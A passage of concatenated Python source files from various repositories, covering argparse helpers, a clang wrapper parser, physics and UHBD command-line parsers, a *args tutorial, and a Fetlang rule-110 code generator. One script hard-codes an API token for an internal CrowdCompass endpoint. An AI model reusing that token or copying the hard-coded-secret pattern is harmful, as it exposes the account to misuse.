print("\033[93m" + text % dirname + "\033[0m")
os.makedirs(dirname)
assert os.path.isdir(dirname), dirname
assert os.access(dirname, os.R_OK), dirname
assert os.access(dirname, os.W_OK), dirname
# Sentinel meaning "no upper bound" in the ranged_* factories below.
FLOAT_INF = float('inf')
class input_dir(str):
"""Argparse type for input dir options."""
is_path, is_dir = True, True
def __new__(cls, path):
npath = _normalized_path(path) + '/'
_assert_dir_already_exists(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(input_dir, self).__init__()
class input_file(str):
"""Argparse type for input file options."""
is_path, is_dir = True, False
def __new__(cls, path):
npath = _normalized_path(path)
_assert_file_is_good(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(input_file, self).__init__()
class output_dir(str):
"""Argparse type for output dir options."""
is_path, is_dir = True, True
def __new__(cls, path):
npath = _normalized_path(path) + '/'
_assert_dir_exists(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(output_dir, self).__init__()
class output_file(str):
"""Argparse type for output file options."""
is_path, is_dir = True, False
def __new__(cls, path):
npath = _normalized_path(path)
_assert_dir_exists(os.path.dirname(npath))
return str.__new__(cls, npath)
def __init__(self, path):
super(output_file, self).__init__()
def image_dir(ftype=".png"):
"""Image directory factory."""
class image_dir():
"""Argparse type for input image glob."""
is_path, is_dir = True, False
def __str__(self):
return self.path.__str__()
def __next__(self):
return six.next(self.imgs)
def next(self):
return six.next(self.imgs)
def __iter__(self):
return self
def __init__(self, path):
self.path = _normalized_path(path) + '/'
_assert_dir_already_exists(self.path)
self.imgs = glob.iglob(self.path + '*' + ftype)
self.imgs = _assert_non_empty(self.imgs)
return image_dir
class input_image(input_file):
"""Argparse type for image file options."""
def __new__(cls, path):
assert _iendswith(path, _IMG_EXTS), path
return input_file.__new__(cls, path)
class output_image(output_file):
"""Argparse type for image file options."""
def __new__(cls, path):
assert _iendswith(path, _IMG_EXTS), path
return output_file.__new__(cls, path)
def ranged_float(A, B=FLOAT_INF):
"""Ranged floats type factory."""
class ranged_float(float):
"""Float type in [A; B] range."""
def __init__(self, value):
assert A <= float(value) <= B, value
super(ranged_float, self).__init__()
return ranged_float
def multiple_of(factor):
"""Factory for x = k * factor, k in Z."""
class multiple_of(int):
"""Int type in [A; B] range."""
def __init__(self, k):
assert int(k) % factor == 0, (k, factor)
super(multiple_of, self).__init__()
return multiple_of
def ranged_int(A, B=FLOAT_INF):
"""Ranged floats type factory."""
class ranged_int(int):
"""Int type in [A; B] range."""
def __init__(self, value):
assert A <= int(value) <= B, value
super(ranged_int, self).__init__()
return ranged_int
| {
"repo_name": "Bellaktris/.files",
"path": "python/.local/lib/python/argparse_classes.py",
"copies": "1",
"size": "5753",
"license": "mit",
"hash": 7432103306581749000,
"line_mean": 24.0130434783,
"line_max": 59,
"alpha_frac": 0.5854336868,
"autogenerated": false,
"ratio": 3.6388361796331434,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9723752268089458,
"avg_score": 0.00010351966873706004,
"num_lines": 230
} |
"""argparse based argument parser for clang-hook"""
import abc
import sys
import argparse
from .auto_number import AutoNumber
class OptimisationLevel(AutoNumber):
"""Enumeration for -On option. Default is -O0."""
O0 = ()
O1 = ()
O2 = ()
O3 = ()
class OutputType(AutoNumber):
"""Enumeration for the output type of the given command."""
Obj = ()
Asm = ()
Elf = ()
def usage():
"""Pretty usage message <3"""
print(sys.argv[0]+"[clang options]")
class OAction(argparse.Action):
"""Handles -On option."""
def __call__(self, _parser, namespace, values, option_string=None):
opt = {
"0": OptimisationLevel.O0,
"1": OptimisationLevel.O1,
"2": OptimisationLevel.O2,
"3": OptimisationLevel.O3,
}[values]
setattr(namespace, self.dest, opt)
class AbstractFlagAction(argparse.Action, metaclass=abc.ABCMeta):
"""Handles options of the kind -Xfoo. It stores -Xfoo (and not just foo) to be easily given to the underlying
commands"""
def __init__(self, prefix, option_strings, dest, **kwargs):
self.prefix = prefix
super(AbstractFlagAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, _parser, namespace, values, option_string=None):
if self.dest in namespace:
old = getattr(namespace, self.dest)
else:
old = []
if old is None:
old = []
old.append(self.prefix + str(values))
setattr(namespace, self.dest, old)
class WAction(AbstractFlagAction):
"""Handles warning flags"""
def __init__(self, option_strings, dest, **kwargs):
super(WAction, self).__init__("-W", option_strings, dest, **kwargs)
class LAction(AbstractFlagAction):
"""Handles link flags"""
def __init__(self, option_strings, dest, **kwargs):
super(LAction, self).__init__("-l", option_strings, dest, **kwargs)
class DAction(AbstractFlagAction):
"""Handles define flags"""
def __init__(self, option_strings, dest, **kwargs):
super(DAction, self).__init__("-D", option_strings, dest, **kwargs)
class IAction(AbstractFlagAction):
"""Handles include flags"""
def __init__(self, option_strings, dest, **kwargs):
super(IAction, self).__init__("-I", option_strings, dest, **kwargs)
def init_hook_parser():
"""Builds and returns the argument parser."""
p = argparse.ArgumentParser(description='Hook for clang.')
p.add_argument("input_files", metavar="File", type=str, nargs='+', help="A file to compile")
p.add_argument('-D', metavar="flag", dest='defines', action=DAction, type=str, help="A define")
p.add_argument('-I', metavar="path", dest='includes', action=IAction, type=str, help="An include")
p.add_argument('-l', metavar="flag", dest='links', action=LAction, type=str, help="Enable a link flag")
p.add_argument('-W', metavar="flag", dest='warnings', action=WAction, type=str, help="Enable a warning")
p.add_argument('-w', dest='warnings', action='append_const', const="-w", help="Suppress all warnings")
p.add_argument('-std', dest='standard', action='store', help="Choose the standard")
p.add_argument('-o', metavar="path", dest='output_file', action='store', type=str, help="Output file")
p.add_argument('-c', metavar="path", dest='output_type', action='store_const', const=OutputType.Obj,
default=OutputType.Elf, help="To bytecode")
p.add_argument('-S', dest='output_type', action='store_const', const=OutputType.Asm,
default=OutputType.Elf, help="To assembly")
p.add_argument('-rdynamic', dest='links', action='append_const', const='-rdynamic', help="export dynamic")
p.add_argument('-O', metavar="level", dest='optimization_level', action=OAction, default=OptimisationLevel.O0,
help="Optimization level")
p.add_argument('--hook', metavar="flag", dest='hook', action='append', type=str,
help="Give a parameter to the hook. Must be repeted before each hook argument")
p.add_argument('--hook-config', metavar="path", dest='hook_config', action='store', type=str,
help="A path to the config. It will be look at first.")
p.add_argument('--version', action='version', version='%(prog)s 0.1')
return p
| {
"repo_name": "s-i-newton/clang-hook",
"path": "lib_hook/hook_parser.py",
"copies": "1",
"size": "4353",
"license": "apache-2.0",
"hash": -2426956755473027000,
"line_mean": 40.0660377358,
"line_max": 114,
"alpha_frac": 0.6287617735,
"autogenerated": false,
"ratio": 3.6889830508474577,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9809718473179299,
"avg_score": 0.0016052702336318448,
"num_lines": 106
} |
# argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
class ArgParser(object):
def parsePtCutString(self, ptCutString):
return map(float, string.split(ptCutString,',') )
def parseEventsString(self, eventsString):
return map(int, string.split(eventsString,',') )
def displayUserInfo(self):
print ""
print "o------------------o"
print "|Extracthistos Info|"
print "o------------------o"
print ""
print "[example usage]"
print ""
print "extracthistos inputFile.root"
print ""
print "extracthistos inputFile.root /intputDir/*.root --visualize --output outputfile-extracted.root --ptcuts 20,30,50,100 --etacut 2.5 --limit 100"
print ""
print "extracthistos inputFile.root /intputDir/*.root -v -o outputfile-extracted.root -p 20,30,50,100 -e 2.5 -l 100"
print ""
print "[switches]"
print " -d | --debug: Show debug information"
print " -e | --etacut: Set etaCut (double)"
print " -f | --force: Force overwriting of output file"
print " -i | --info: Shows this info"
print " -l | --limit: Limit maximum # of events processed"
print " -o | --output: Set output file (string)"
print " -od | --output-outputdirectory: Set output directory (string)"
print " -p | --ptcuts: Set pTcuts (list of doubles seperated by ',')"
print " -# | --events: Specify events to processed (list of ints seperated by ',')"
print " -m | --multi-processing: create n (int) subprocesses"
print " -% | --modulo: process only every nth event (int)"
print " -%r | --modulo-rest: process only every nth + r event (int)"
print " -v | --visualize: Create visualization(s)"
print " -vs | --visualize-skip-copies: Do not render non-physical particle copies"
print " -vnu | --visualize-no-underlying-event: Do not visualize the underlying event"
print " -vni | --visualize-no-main-interaction: Do not visualize the main interaction"
print " -vsj | --visualize-color-special-jets: Color special particle jets"
print " -vce | --visualize-cutoff-energy: Specify Visualization energy cutoff (double)"
print " -vcs | --visualize-cutoff-special-jets: Cutoff Special Jets"
print " -vcr | --visualize-cutoff-radiation: Cutoff ISR/FSR Jets"
print " -vme | --visualize-mode-energy: Color particles by their energy"
print " -vmp | --visualize-mode-pt: Color particles by their pT"
print " -vr | --visualize-renderer: Specify GraphViz renderer (string), defaults to 'dot'"
print ""
def __init__(self, args):
self.runParams = RunParams()
lenArgs = len(args)
skip = False
forceOutputOverride = False
for i in range (0, lenArgs):
# skip first arg as it's the script's name
if i == 0 or skip:
skip = False
continue
# provide arg and nextArg (if possible)
arg = args[i]
nextArg = None
if (i < lenArgs - 1):
nextArg = args[i+1]
# parse switches
if ( arg == "-d" ) or ( arg == "--debug" ) :
self.runParams.useDebugOutput = True
continue
if ( arg == "-e" ) or ( arg == "--etacut" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.eta = float(nextArg)
skip = True
continue
if ( arg == "-f" ) or ( arg == "--force" ) :
forceOutputOverride = True
continue
if ( arg == "-i" ) or ( arg == "--info" ) :
self.displayUserInfo()
self.runParams.run = False
break
if ( arg == "-l" ) or ( arg == "--limit" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.maxEvents = int(nextArg)
skip = True
continue
if ( arg == "-o" ) or ( arg == "--output" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
if nextArg [-15:] <> '-extracted.root':
raise Exception("'" + arg + "': Output file must end with '-extracted.root'!")
self.runParams.outputFile = nextArg
skip = True
continue
if ( arg == "-p" ) or ( arg == "--ptcuts" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
ptCutString = nextArg
self.runParams.pTCuts = self.parsePtCutString(ptCutString)
skip = True
continue
if ( arg == "-v" ) or ( arg == "--visualize" ) :
self.runParams.useVisualization = True
continue
if ( arg == "-vs" ) or ( arg == "--visualize-skip-copies" ) :
self.runParams.visualizationSkipCopies = True
continue
if ( arg == "-vnu" ) or ( arg == "--visualize-no-underlying-event" ) :
self.runParams.visualizationShowUnderlyingEvent = False
continue
if ( arg == "-vni" ) or ( arg == "--visualize-no-main-interaction" ) :
self.runParams.visualizationShowMainInteraction = False
continue
if ( arg == "-vsj" ) or ( arg == "--visualize-color-special-jets" ) :
self.runParams.visualizationColorSpecialJets = True
continue
if ( arg == "-vme" ) or ( arg == "--visualize-mode-energy" ) :
self.runParams.visualizationEnergyMode = True
continue
if ( arg == "-vmp" ) or ( arg == "--visualize-mode-pt" ) :
self.runParams.visualizationPtMode = True
continue
if ( arg == "-vce" ) or ( arg == "--visualize-cutoff-energy" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationEnergyCutoff = int(nextArg)
skip = True
continue
if ( arg == "-vcr" ) or ( arg == "--visualize-cutoff-radiation" ) :
self.runParams.visualizationCutoffRadiation = True
continue
if ( arg == "-vcs" ) or ( arg == "--visualize-cutoff-special-jets" ) :
self.runParams.visualizationCutSpecialJets = True
continue
#if ( arg == "-vp" ) or ( arg == "--visualize-pt-cutoff" ) :
#if nextArg is None or nextArg[0] == '-':
#raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
#self.runParams.visualizationPtCutoff = int(nextArg)
#skip = True
#continue
if ( arg == "-vr" ) or ( arg == "--visualize-renderer:" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationRenderer = nextArg
skip = True
continue
#if ( arg == "-z" ) or ( arg == "--zero-jets" ) :
#self.runParams.zeroAdditionalJets = True
#continue
if ( arg == "-#" ) or ( arg == "--events" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
eventsString = nextArg
self.runParams.events = self.parseEventsString(eventsString)
skip = True
continue
if ( arg == "-od" ) or ( arg == "--output-outputdirectory" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.outputDir = nextArg
skip = True
continue
if ( arg == "-m" ) or ( arg == "--multi-processing" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.multiProcessing = int(nextArg)
skip = True
continue
if ( arg == "-%" ) or ( arg == "--modulo" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.modulo = int(nextArg)
skip = True
continue
if ( arg == "-%r" ) or ( arg == "--modulo-rest" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.moduloRest = int(nextArg)
skip = True
continue
if (arg[0] == '-'):
raise Exception("'" + arg + "' is not a valid switch!")
# deny input files ending with '-extracted.root', as this is our signature for output files:
if arg[-15:] == '-extracted.root':
print "Warning: File '" + arg + "' is being skipped."
continue
# parse input files:
if arg[-5:] == '.root':
thisFile = arg
if thisFile[:7] == "/store/":
if not os.path.isfile(thisFile):
thisFile = "root://xrootd.ba.infn.it/" + thisFile
else:
if not os.path.isfile(thisFile):
raise Exception("File '" + thisFile + "' does not exist!")
self.runParams.inputFileList.append(thisFile)
continue
raise Exception("'" + arg + "' is not a valid root file!")
if self.runParams.useVisualization and len(self.runParams.inputFileList) > 1:
raise Exception("Visualization is allowed only for exactly one input file.")
if self.runParams.run:
if os.path.isfile(self.runParams.outputFile) and not forceOutputOverride:
raise Exception("'" + self.runParams.outputFile + "' exists. Use the --force switch to force overriding.")
if len(self.runParams.outputDir) <> 0:
if not os.path.exists(self.runParams.outputDir):
os.makedirs(self.runParams.outputDir)
self.runParams.outputFilePath = self.runParams.outputDir + "/" + self.runParams.outputFile
else:
self.runParams.outputFilePath = self.runParams.outputFile
#self.displayInfo()
| {
"repo_name": "mharrend/plotscripts",
"path": "argparser.py",
"copies": "2",
"size": "9893",
"license": "mit",
"hash": 7057918201830962000,
"line_mean": 38.8911290323,
"line_max": 153,
"alpha_frac": 0.5741433337,
"autogenerated": false,
"ratio": 3.4651488616462345,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5039292195346234,
"avg_score": null,
"num_lines": null
} |
"""argParser.py:
Parses arguments from a command line.
Requires four arguments: argv,required_arg,required_arg_type,optional_arg
argv is a direct pass of sys.argv
required_arg (list) arguments required for calling script execution.
FINISH ME!
"""
#*****************************************************************************#
# INITALIZE MODULE #
#*****************************************************************************#
__author__ = "Michael J. Harms"
__version__ = "0.1"
__date__ = "1/13/06"
from optparse import OptionParser
import sys
import os
import copy
# SEE BOTTOM OF SCRIPT TO DEFINE OPTIONS THAT THE SCRIPT "KNOWS" HOW TO PARSE
#*****************************************************************************#
# FUNCTION DEFINITIONS #
#*****************************************************************************#
def addDielectric(default_dielectric=20):
    """Register the -D/--dielectric float option on the module-level parser."""
    parser.add_option(
        "-D", "--dielectric",
        dest="dielectric",
        action="store",
        type="float",
        default=default_dielectric,
        help="Dielectric constant for UHBD calculations (default=20)")
def addIonicStrength(default_ionic_strength=0.1):
    """Register the -I/--ionic-strength float option on the module-level parser."""
    parser.add_option(
        "-I", "--ionic-strength",
        dest="ionic_strength",
        action="store",
        type="float",
        default=default_ionic_strength,
        help="Ionic strength for UHBD calculations (default=0.1 M)")
def addPHTitration(default_pH_titration=(0,16,0.25)):
    """Register the -P/--pH-titration option on the module-level parser.

    The option takes three float values: PH_START PH_STOP PH_INTERVAL.
    """
    # fix: the help text used to be a single backslash-continued string
    # literal, which embedded the source indentation (long runs of spaces)
    # into the displayed help; adjacent literals keep it clean.
    parser.add_option("-P","--pH-titration",action="store",type="float",
                      dest="pHtitr",nargs=3,
                      help=("pH titration for UHBD calculations. PHTITR is a "
                            "set of three values PH_START PH_STOP PH_INTERVAL. "
                            "(Default 0 16 0.25)"),
                      default=default_pH_titration)
def grabRequiredArgs(passed_required_arg,required_arg,required_arg_type):
"""Checks validity of required arguments (i.e. inputfile and output_dir).
Arguments:
passed_required_args (list) set of arguments on the command line
that are not a part of an "option"
required_arg (list) list of string identifiers for required
arguments.
required_arg_type (list) list of strings that identify argument
types. Types are'inpfile', 'outfile',
or 'outdir', telling script whether to
check for file existance, create new
file, or create a new output directory.
Returns:
required_arg_values (dict) Dictionary of required_arg identifiers
and command line values.
"""
# Check for correct number of arguments
if len(passed_required_arg) - 1 < len(required_arg):
print "Missing arguments(s)"
print "Try --help for options."
sys.exit(1)
# Pull command line values and place in dictionary with correct argument
# identifier
required_arg_values = {}
for i in range(0,len(required_arg)):
required_arg_values.update([(required_arg[i],passed_required_arg[i+1])])
# Do a few sanity checks on required arguments (using required_arg_type)
for index, arg in enumerate(required_arg):
# Check for input file existance
if required_arg_type[index] == 'inpfile':
try:
open(required_arg_values[arg],'r')
except IOError:
print "File '" + required_arg_values[arg] + "' not readable!"
sys.exit(2)
# Prompt before overwriting output files
if required_arg_type[index] == 'outfile':
try:
open(required_arg_values[arg],'r')
except IOError:
continue
decision = raw_input("Warning! File '" + required_arg_values[arg] \
+ "' already exists! overwrite (y/n)? ")
if decision[0] == 'Y' or decision[1] == 'y':
os.remove(required_arg_values[arg])
else:
sys.exit()
# Check for directory existance
if required_arg_type[index] == 'outdir':
try:
os.listdir(required_arg_values[arg])
except OSError:
decision = raw_input("Directory '" + required_arg_values[arg] + \
"' does not exist. Create it (y/n)? ")
if decision[0] == 'Y' or decision[0] == 'y':
os.mkdir(required_arg_values[arg])
else:
sys.exit()
# If there are any more arguments on the command line, report them and
# ignore them.
if len(passed_required_arg) - 1 > len(required_arg):
print "Trailing arguments (not evaluated):"
for trailer in passed_required_arg[len(required_arg):]:
print trailer
return required_arg_values
def main(argv, required_arg, required_arg_type, optional_arg):
    """Register the requested options, parse argv, and return the values.

    Returns a tuple (required_arg_values, passed_optional_arg) where the
    first element comes from grabRequiredArgs and the second is the
    optparse options object.
    """
    # Install each requested optional argument on the module-level parser.
    for option_name in optional_arg:
        parse_option_dictionary[option_name]()
    # Parse the command line; optparse returns (options, positionals).
    options, positionals = parser.parse_args(argv)
    required_values = grabRequiredArgs(positionals, required_arg,
                                       required_arg_type)
    return required_values, options
#*****************************************************************************#
# DEFINE OPTIONS SCRIPT IS ABLE TO PARSE #
#*****************************************************************************#
# Module-level option parser shared by all the add* helper functions above.
global parser  # no-op at module scope; retained from the original
parser = OptionParser()

# Dispatch table: option identifier -> function that registers it on parser.
parse_option_dictionary = {
    "ionic_strength": addIonicStrength,
    "dielectric": addDielectric,
    "pHtitr": addPHTitration,
}
# REMOVE THIS, WON'T BE USED IN PRODUCTION!
# Smoke test: exercises main() with dummy required/optional argument specs.
if __name__ == "__main__":
    print main(sys.argv,["file1","file2"],["inpfile","outdir"],["ionic_strength","dielectric","pHtitr"])
| {
"repo_name": "harmsm/uhbd",
"path": "previous_releases/0.4.0/argParser.py",
"copies": "1",
"size": "6755",
"license": "unlicense",
"hash": -5768802788341243000,
"line_mean": 40.4417177914,
"line_max": 104,
"alpha_frac": 0.518430792,
"autogenerated": false,
"ratio": 4.476474486414844,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.024270803664210527,
"num_lines": 163
} |
# argparse tells script user if they have supplied the right values
import argparse
import requests #http for humans
def main():
parser = argparse.ArgumentParser()
# Checks if the arguments needed for the script are supplied.
parser.add_argument("event_oid", help="example: 'Ce6TKMojss' ")
parser.add_argument("env", default='staging')
# dev, qa, staging, production
args = parser.parse_args()
if args.env:
print "env turned on"
# Thanks user for using the help tool correctly.
print "Thanks for the 2 pieces of info: \n {}".format(args.event_oid)
api_key = '392c0d3bc5ed87aaf56eb6c9f3d63bd7'
# combines user supplied info to url
url = 'https://eventcenter.crowdcompass.com/internal/v3/build/apps/%s' % (args.event_oid)
#tells that json is the type of file type desired
headers = {}
headers['Content-Type'] = 'application/json'
headers['Accept'] = 'application/json'
params = {}
params['api_token'] = '392c0d3bc5ed87aaf56eb6c9f3d63bd7'
# make the request
req = requests.get(url, headers=headers, params=params)
# print the results of the request
print req
# Standard script entry-point guard.
if __name__ == '__main__':
    main()
| {
"repo_name": "talapus/Ophidian",
"path": "CC/requesting_json_content_with_appoid.py",
"copies": "1",
"size": "1208",
"license": "bsd-3-clause",
"hash": 4336362092733477400,
"line_mean": 26.4545454545,
"line_max": 93,
"alpha_frac": 0.6713576159,
"autogenerated": false,
"ratio": 3.4613180515759314,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9496264254640864,
"avg_score": 0.027282282567013483,
"num_lines": 44
} |
# *args & **kwargs
# https://freepythontips.wordpress.com/2013/08/04/args-and-kwargs-in-python-explained/
# Python has some great flexibility in calling functions with an assortment of arguments. Most
# functions you write have a set of arguments that you need and you have to place them in a specific
# order.
def fn_one(arg1, arg2, arg3):
print arg1
print arg2
print arg3
# Demonstrate calling fn_one with exactly three positional arguments.
print "Calling fn_one()"
fn_one(1, 2, 3)
# Calling "fn_one" with all of the arguments means you need to pass them one at a time in the right
# order. "*args" allows you to include an additional list of unknown length to the function, which
# by convention should come after your "formal arguments" or explicitly named ones.
def fn_two(arg1, arg2, *args):
print arg1
print arg2
for arg in args:
print arg
print "\n"
# Demonstrate *args absorbing the four extra positional arguments.
print "Calling fn_two()"
fn_two(1, 2, 3, 4, 5, 6)
# We can iterate through the list of *args like any other list! Optionally, **kwargs let you key
# specific values without needing them to be defined in the formal arguments list:
def fn_three(arg1, *args, **kwargs):
print arg1
for arg in args:
print arg
for key, value in kwargs.iteritems():
print key, value
print "\n"
# Demonstrate positional extras plus keyword extras in a single call.
print "Calling fn_three()"
fn_three(1, 2, 3, 4, five=5, six=6, seven=7)
# PyCharm Debugging
# PyCharm lets us do some interactive debugging within our local environment. We can have the server
# that normally runs the Python from the vagrant box to instead be served through PyCharm.
# Add the following configuration to your PyCharm configurations:
# Fill in all of the ___ with the path to your local repository
# Script = ___/mm2/server.py
# Environment variables = PYTHONUNBUFFERED=1 | {
"repo_name": "mysidewalk/training-django",
"path": "01-middling-python/04-debugging/debugging.py",
"copies": "1",
"size": "1719",
"license": "mit",
"hash": 668452319214059300,
"line_mean": 32.7254901961,
"line_max": 101,
"alpha_frac": 0.7178592205,
"autogenerated": false,
"ratio": 3.4939024390243905,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47117616595243905,
"avg_score": null,
"num_lines": null
} |
# Number of rule-110 generations to emit and the width of the cell row.
iterations = 40;
gridWidth = 40;
## Vars ##
# Current indentation depth of the emitted Fetlang code (see indent/unindent).
indentLevel = 0;
# NOTE: 'file' shadows the builtin of the same name; kept since every emitter uses it.
file = open("110-generated.fet", "w")
def indent():
    """Increase the emitted-code indentation by one level."""
    global indentLevel
    indentLevel += 1
def unindent():
    """Decrease the emitted-code indentation by one level."""
    global indentLevel
    indentLevel -= 1
def newline():
    """Emit a blank line of generated code."""
    printCode("")
def printCode(code):
    """Write one line of generated code at the current indentation level."""
    global indentLevel
    file.write("\t" * indentLevel + code + "\n")
## These things are constant for any size
def generateIntro():
    """Emit the fixed prologue: tape strings, digit characters, counters."""
    # An empty string emits a blank line (newline() == printCode("")).
    prologue = [
        'Make Laura moan',
        'Make Julia moan "#' + "0" * (gridWidth - 3) + '1#"',
        "",
        'Make startString moan "#0"',
        'Make endString moan "0#"',
        "",
        'Lick AsciiZero forty eight times',
        'Lick AsciiOne forty nine times',
        "Lick AsciiOcto's thigh thirty five times",
        "",
        "Worship Counter",
        "Worship iterations",
        "",
        "Worship left",
        "Worship middle",
        "Worship right",
        "",
        "",
        "",
    ]
    for line in prologue:
        printCode(line)
## A better solution would write the string literal for the number, but this is generated code, so allow my laziness.
def generateNumbers():
    """Declare number0 and lick each numberK variable exactly K times."""
    printCode("Worship number0")
    highest = max(gridWidth - 1, iterations)
    for value in range(1, highest + 1):
        name = "number" + str(value)
        for _ in range(value):
            printCode("lick " + name)
    newline()
    newline()
def beginLoop():
    """Open the main simulation loop and step one level deeper."""
    printCode("while iterations is submissive to Number{0}".format(iterations))
    indent()
    newline()
    newline()
def setEmptyPositions():
    """Blank every interior cell of the current and the next generation."""
    for cell in range(2, gridWidth - 2):
        printCode("make position{0} moan".format(cell))
        printCode("make nextposition{0} moan".format(cell))
    newline()
    newline()
def resetTempVariables():
    """Zero the scratch registers and the line buffer before a pass."""
    for scratch in ("left", "middle", "right", "counter"):
        printCode("Have {0} spank {0}".format(scratch))
    printCode("Make Laura moan")
    newline()
def incrementLoopCounter():
    """Advance the outer iteration counter by one."""
    printCode("lick iterations")
    newline()
def printCurrentState():
    """Emit the instruction that prints the current generation string."""
    printCode("Make Slave Scream Julia")
    newline()
def generateParentString(pos):
    """Emit code copying the current character into position{pos} while the
    counter lies in the window around pos (per Fetlang comparison semantics)."""
    printCode("If counter is submissive to number{0}".format(pos + 2))
    indent()
    printCode("If counter is dominant towards number{0}".format(pos - 2))
    indent()
    printCode("Have Emma hogtie position{0}".format(pos))
    unindent()
    unindent()
    newline()
#This function is the main trick to running the 110.
#For each cell, we create a string that contains three chars:
#The ones relevant to it's activation.
def getParentStrings():
    """Walk the current generation (Julia) and, for every non-'#' character,
    copy the relevant neighbourhood into each cell's position variable."""
    printCode("Bind Emma to Julia")
    indent()
    printCode("If Emma is not AsciiOcto")
    indent()
    for cell in range(2, gridWidth - 2):
        generateParentString(cell)
    unindent()
    printCode("lick counter")
    unindent()
    newline()
    newline()
    newline()
def getDescendants():
    """Emit the rule-evaluation code for every interior cell."""
    for cell in range(2, gridWidth - 2):
        getDescendant(cell)
    newline()
    newline()
    newline()
def getDescendant( pos ):
printCode( "Have counter spank counter" )
printCode( "Have left spank left" )
printCode( "Have middle spank middle" )
printCode( "Have right spank right" )
newline()
newline()
printCode( "Bind Emma to position" + str( pos ) )
indent()
printCode( "if counter is number0" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick left" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick left" )
unindent()
unindent()
printCode( "if counter is number1" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick middle" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick middle" )
unindent()
unindent()
printCode( "if counter is number2" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick right" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick right" )
unindent()
unindent()
printCode( "Lick counter" )
unindent()
newline()
newline()
printCode( "if left is AsciiOne" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "if right is AsciiZero" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
printCode( "if middle is AsciiZero" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
printCode( "if left is AsciiZero" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
newline()
newline()
newline()
def writeNextGeneration():
    """Assemble the next-generation string in Laura, framed by '#0' and '0#'."""
    printCode('make Laura moan "#0"')
    for cell in range(2, gridWidth - 2):
        writeNextGenerationPosition(cell)
    printCode("have AsciiZero hogtie Laura")
    printCode("have AsciiOcto hogtie Laura")
    newline()
    newline()
    newline()
def writeNextGenerationPosition(pos):
    """Append cell pos's next-generation character to Laura."""
    printCode("bind Emma to nextposition{0}".format(pos))
    indent()
    printCode("if Emma is AsciiZero")
    indent()
    printCode("have AsciiZero hogtie Laura")
    unindent()
    printCode("otherwise")
    indent()
    printCode("have AsciiOne hogtie Laura")
    unindent()
    unindent()
def saveNextGeneration():
    """Copy the assembled line from Laura back into Julia.

    NOTE(review): this emits an indent without a matching unindent, leaving
    the generated loop body open at the end of each pass -- appears to rely
    on the program ending here; confirm against the Fetlang grammar.
    """
    printCode("Make Julia moan")
    printCode("bind Emma to Laura")
    indent()
    printCode("have Emma hogtie Julia")
def main():
    """Run every generation stage in order to emit the whole program."""
    steps = (
        generateIntro,
        generateNumbers,
        beginLoop,
        resetTempVariables,
        setEmptyPositions,
        incrementLoopCounter,
        printCurrentState,
        getParentStrings,
        getDescendants,
        writeNextGeneration,
        saveNextGeneration,
    )
    for step in steps:
        step()
# Generate the full Fetlang program when this script is executed.
main()
| {
"repo_name": "KjeldSchmidt/Fetlang_110",
"path": "generator.py",
"copies": "1",
"size": "6098",
"license": "unlicense",
"hash": -8928657768424851000,
"line_mean": 21.5018450185,
"line_max": 117,
"alpha_frac": 0.693014103,
"autogenerated": false,
"ratio": 2.7518050541516246,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39448191571516245,
